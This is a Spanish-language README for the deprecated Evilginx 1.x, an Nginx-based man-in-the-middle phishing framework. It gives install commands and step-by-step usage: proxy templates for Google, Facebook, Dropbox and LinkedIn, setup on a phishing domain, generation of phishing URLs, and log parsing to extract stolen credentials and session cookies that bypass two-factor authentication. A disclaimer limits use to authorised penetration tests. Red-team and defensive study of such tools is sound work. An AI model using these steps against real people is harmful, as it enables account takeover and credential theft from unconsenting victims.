
POR FAVOR, USE LA NUEVA VERSIÓN: https://github.com/kgretzky/evilginx2

ESTA VERSIÓN ESTÁ OBSOLETA. ¡USE LA VERSIÓN MÁS RECIENTE!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx es un framework de ataque man-in-the-middle utilizado para suplantar credenciales y cookies de sesión de cualquier servicio web. Su núcleo se ejecuta en el servidor HTTP Nginx, que utiliza proxy_pass y sub_filter para proxy y modificar contenido HTTP, mientras intercepta el tráfico entre el cliente y el servidor.
Puedes aprender cómo funciona y cómo instalar todo tú mismo en mi blog:
Primera publicación ligeramente desactualizada ahora: Evilginx - Phishing Avanzado con Bypass de Autenticación de Dos Factores
Actualización de Evilginx 1.0: Evilginx 1.0 Update - Mejora tu Juego en Phishing 2FA
Actualización de Evilginx 1.1: Evilginx 1.1 Update
Soy consciente de que Evilginx puede ser utilizado para fines muy nefastos. Este trabajo es simplemente una demostración de lo que atacantes hábiles pueden hacer. Es responsabilidad del defensor tomar en cuenta tales ataques al configurar las defensas y encontrar formas de protegerse contra este método de phishing. Evilginx debe ser utilizado solo en asignaciones legítimas de pruebas de penetración con permiso por escrito de las partes a ser suplantadas.
Evilginx proporciona un script de instalación install.sh que se encarga de instalar todo el paquete en cualquier máquina Debian wheezy/jessie, de manera automática.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Habilita o deshabilita configuraciones de sitios para usar con el servidor Nginx, utilizando las plantillas de Evilginx proporcionadas del directorio sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
Lista las plantillas de configuración de sitios disponibles:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Habilita el sitio de phishing de google con un dominio de phishing preregistrado not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
Deshabilita el sitio de phishing de facebook:
python evilginx.py setup --disable facebook
Analiza los registros de Nginx para extraer credenciales de inicio de sesión y cookies de sesión interceptadas. Los registros, por defecto, se guardan en el directorio logs, donde reside el script evilginx.py.
Esto se puede hacer automáticamente después de habilitar el auto-análisis en la fase de Configuración.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Analiza registros solo para el sitio de google:
python evilginx.py parse -s google
Analiza registros para todos los sitios disponibles:
python evilginx.py parse -s all
Genera URLs de phishing que puedas usar en tus evaluaciones de Red Team.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
Genera una URL de phishing de google que redirigirá a la víctima al video de rick'roll al iniciar sesión correctamente:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ